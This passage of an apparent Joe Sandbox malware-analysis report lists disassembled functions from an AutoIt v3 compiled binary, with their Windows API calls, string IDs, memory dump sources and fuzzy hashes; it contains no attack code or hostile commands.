                                                                                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0095A527
                                                                                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0095A539
                                                                                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0095A57F
                                                                                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0095A58B
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0095A5CF
                                                                                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0095A5DE
                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0095A5EE
                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0095A5F2
                                                                                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0095A602
                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095A60B
                                                                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 0095A614
                                                                                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0095A642
                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0095A659
                                                                                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0095A694
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0095A6A8
                                                                                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0095A6B9
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0095A6E9
                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0095A6F4
                                                                                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 0095A6FF
                                                                                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 0095A709
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                                                                                      • Opcode ID: ab853a301dfc995fa4f1431e67635e2df9628175aa6360b0671fe9655cc085ad
                                                                                                                                                                                      • Instruction ID: 0c0c82a077d105a8fe53daf3470a8f9d1d518b8045b8460caa16a035c5b77a3d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ab853a301dfc995fa4f1431e67635e2df9628175aa6360b0671fe9655cc085ad
                                                                                                                                                                                      • Instruction Fuzzy Hash: ABA16DB1A10215BFEB14DFA5DD4AFAE7BB9EB45710F004214FA14A72E1D7B0AD00DB64
                                                                                                                                                                                      Function 0094E44C Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0094E45E
                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?,0099DC88,?,\\.\,0099DBF0), ref: 0094E54B
                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,0099DC88,?,\\.\,0099DBF0), ref: 0094E6B1
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                                                                                      • Opcode ID: 3d92437d5dd9b4ceb442130ad21c0032499716d0edb61780f67e15eec9cc1917
                                                                                                                                                                                      • Instruction ID: 3e4431e114627afdf36a64765f01a8c8422a1dfd2b62736e49e2cd05483576c7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d92437d5dd9b4ceb442130ad21c0032499716d0edb61780f67e15eec9cc1917
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5151D330249309ABC700DF54C991D6ABB90BBE472CF52CE19F882A72E1DB30DE45DB42
                                                                                                                                                                                      Function 0090C714 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 245COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                                                                                      • Opcode ID: 8ac39671aad2d279d4b48c3d5a4558c2f992b0986e934099d396f16308d0b3ee
                                                                                                                                                                                      • Instruction ID: d8f2aabf83f8dcba2d307ebe88d582286baeeb4b8169cc66195c8527381b29ae
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8ac39671aad2d279d4b48c3d5a4558c2f992b0986e934099d396f16308d0b3ee
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B6169B2300312BFDB25BF249C82FBA339CAF85344F148524FD45AA1D6EB64DA01D6A1
                                                                                                                                                                                      Function 00966189 Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,0099DBF0), ref: 00966245
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                                                                      • API String ID: 3964851224-45149045
                                                                                                                                                                                      • Opcode ID: 0d53a6658392e7b422bd6a325c2970cb84f1278461c590d3e6622874d4ecf955
                                                                                                                                                                                      • Instruction ID: 2a5cc680f46b3c84f509859d80e7fe1a2704491f1afe4233f747dd4824e1a71d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d53a6658392e7b422bd6a325c2970cb84f1278461c590d3e6622874d4ecf955
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0EC160742043058BCB14EF14C561BAE77D6AFD4354F044869B8969B3ABDF34ED4ACB82
                                                                                                                                                                                      Function 0096D385 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 0096D3BE
                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0096D3C2
                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0096D3D8
                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0096D3E3
                                                                                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0096D3E8
                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 0096D400
                                                                                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0096D40E
                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0096D41F
                                                                                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0096D428
                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0096D435
                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0096D454
                                                                                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0096D46B
                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0096D480
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0096D4A8
                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0096D4CF
                                                                                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0096D4ED
                                                                                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0096D4F8
                                                                                                                                                                                      • GetSysColor.USER32(00000011), ref: 0096D506
                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0096D50E
                                                                                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0096D522
                                                                                                                                                                                      • SelectObject.GDI32(?,0096D0B5), ref: 0096D539
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0096D544
                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 0096D54A
                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0096D54F
                                                                                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0096D555
                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0096D55F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1996641542-0
                                                                                                                                                                                      • Opcode ID: 072ebf71bcd383e2b878b0692dd4684e45fccd1aca7bee79c29d810e80c143a1
                                                                                                                                                                                      • Instruction ID: f5507b8af00e3dcd21366395b04bba678db1cebdd168e23e74e2c090ef338ce3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 072ebf71bcd383e2b878b0692dd4684e45fccd1aca7bee79c29d810e80c143a1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 01514B71906208AFDF109FA8DC48EAE7BBAFF49320F204515F925AB2E1D7759D40DB90
                                                                                                                                                                                      Function 0096B4D4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0096B5C0
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0096B5D1
                                                                                                                                                                                      • CharNextW.USER32(0000014E), ref: 0096B600
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0096B641
                                                                                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0096B657
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0096B668
                                                                                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0096B685
                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0096B6D7
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0096B6ED
                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0096B71E
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096B743
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0096B78C
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096B7EB
                                                                                                                                                                                      • SendMessageW.USER32 ref: 0096B815
                                                                                                                                                                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0096B86D
                                                                                                                                                                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0096B91A
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0096B93C
                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?), ref: 0096B986
                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0096B9B3
                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 0096B9C2
                                                                                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 0096B9EA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                      • API String ID: 1073566785-4108050209
                                                                                                                                                                                      • Opcode ID: d2bde41848f5811db81d529573bc77104336f725da4a9dbfd16ce082787a3bab
                                                                                                                                                                                      • Instruction ID: 364881b80e4b684e044c685da0b3aebb3c8690e89452a7cdc3bb88630821703c
                                                                                                                                                                                      • Opcode Fuzzy Hash: d2bde41848f5811db81d529573bc77104336f725da4a9dbfd16ce082787a3bab
                                                                                                                                                                                      • Instruction Fuzzy Hash: D0E17D71904218ABDF209F90CC84EEE7BB8FF45754F10815AF919EB291EB748A81DF60
                                                                                                                                                                                      Function 0096744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00967587
                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0096759C
                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 009675A3
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00967605
                                                                                                                                                                                      • DestroyWindow.USER32(?), ref: 00967631
                                                                                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0096765A
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00967678
                                                                                                                                                                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0096769E
                                                                                                                                                                                      • SendMessageW.USER32(?,00000421,?,?), ref: 009676B3
                                                                                                                                                                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009676C6
                                                                                                                                                                                      • IsWindowVisible.USER32(?), ref: 009676E6
                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00967701
                                                                                                                                                                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00967715
                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0096772D
                                                                                                                                                                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00967753
                                                                                                                                                                                      • GetMonitorInfoW.USER32 ref: 0096776D
                                                                                                                                                                                      • CopyRect.USER32(?,?), ref: 00967784
                                                                                                                                                                                      • SendMessageW.USER32(?,00000412,00000000), ref: 009677EF
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                      • String ID: ($0$tooltips_class32
                                                                                                                                                                                      • API String ID: 698492251-4156429822
                                                                                                                                                                                      • Opcode ID: cff62a8dba930d09f1cdf894c634302c33b0620a5a50d5a17a6e90170f66ddb2
                                                                                                                                                                                      • Instruction ID: 60c38d2473223d6c76454c2e24abf0f01eda9b3376481d5850cc849905a4314c
                                                                                                                                                                                      • Opcode Fuzzy Hash: cff62a8dba930d09f1cdf894c634302c33b0620a5a50d5a17a6e90170f66ddb2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7EB17E71618341AFDB04DF64C948B6AFBE5FF88314F008A1DF5999B291DB70E805CB92
                                                                                                                                                                                      Function 0091A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0091A839
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000007), ref: 0091A841
                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0091A86C
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000008), ref: 0091A874
                                                                                                                                                                                      • GetSystemMetrics.USER32(00000004), ref: 0091A899
                                                                                                                                                                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0091A8B6
                                                                                                                                                                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0091A8C6
                                                                                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0091A8F9
                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0091A90D
                                                                                                                                                                                      • GetClientRect.USER32(00000000,000000FF), ref: 0091A92B
                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0091A947
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0091A952
                                                                                                                                                                                        • Part of subcall function 0091B736: GetCursorPos.USER32(000000FF), ref: 0091B749
                                                                                                                                                                                        • Part of subcall function 0091B736: ScreenToClient.USER32(00000000,000000FF), ref: 0091B766
                                                                                                                                                                                        • Part of subcall function 0091B736: GetAsyncKeyState.USER32(00000001), ref: 0091B78B
                                                                                                                                                                                        • Part of subcall function 0091B736: GetAsyncKeyState.USER32(00000002), ref: 0091B799
                                                                                                                                                                                      • SetTimer.USER32(00000000,00000000,00000028,0091ACEE), ref: 0091A979
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                      • String ID: AutoIt v3 GUI
                                                                                                                                                                                      • API String ID: 1458621304-248962490
                                                                                                                                                                                      • Opcode ID: 4e270c739454b066ea2cadb265c9d98fe918002c0365b8227e2bd48493931449
                                                                                                                                                                                      • Instruction ID: ef9d06620a5d8c0fc64bb12e391899a289470b0aad51d9bbdda4ab3b1af0bf92
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e270c739454b066ea2cadb265c9d98fe918002c0365b8227e2bd48493931449
                                                                                                                                                                                      • Instruction Fuzzy Hash: 26B16771A1520AAFDB14DFA8CC45BEE7BB4BB48314F104229FA15A62E0DB34E880DB55
                                                                                                                                                                                      Function 009669C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00966A52
                                                                                                                                                                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00966B12
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharMessageSendUpper
                                                                                                                                                                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                      • API String ID: 3974292440-719923060
                                                                                                                                                                                      • Opcode ID: e177ced62bbe1b55c4a854a40e41c7ca3c9b80213c0d75b1ef13ec0245dbccf9
                                                                                                                                                                                      • Instruction ID: 4518b8ff2a2024205555562f72e5eab99acc498047228e012a01fdc454d5dd63
                                                                                                                                                                                      • Opcode Fuzzy Hash: e177ced62bbe1b55c4a854a40e41c7ca3c9b80213c0d75b1ef13ec0245dbccf9
                                                                                                                                                                                      • Instruction Fuzzy Hash: D3A181702047059FCB14EF24C961BAAB7E6EFC4354F148969B896AB3D2DB34EC05CB51
                                                                                                                                                                                      Function 0093E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0093E6E1
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0093E6F2
                                                                                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0093E71A
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 0093E737
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0093E755
                                                                                                                                                                                      • _wcsstr.LIBCMT ref: 0093E766
                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0093E79E
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0093E7AE
                                                                                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0093E7D5
                                                                                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0093E81E
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0093E82E
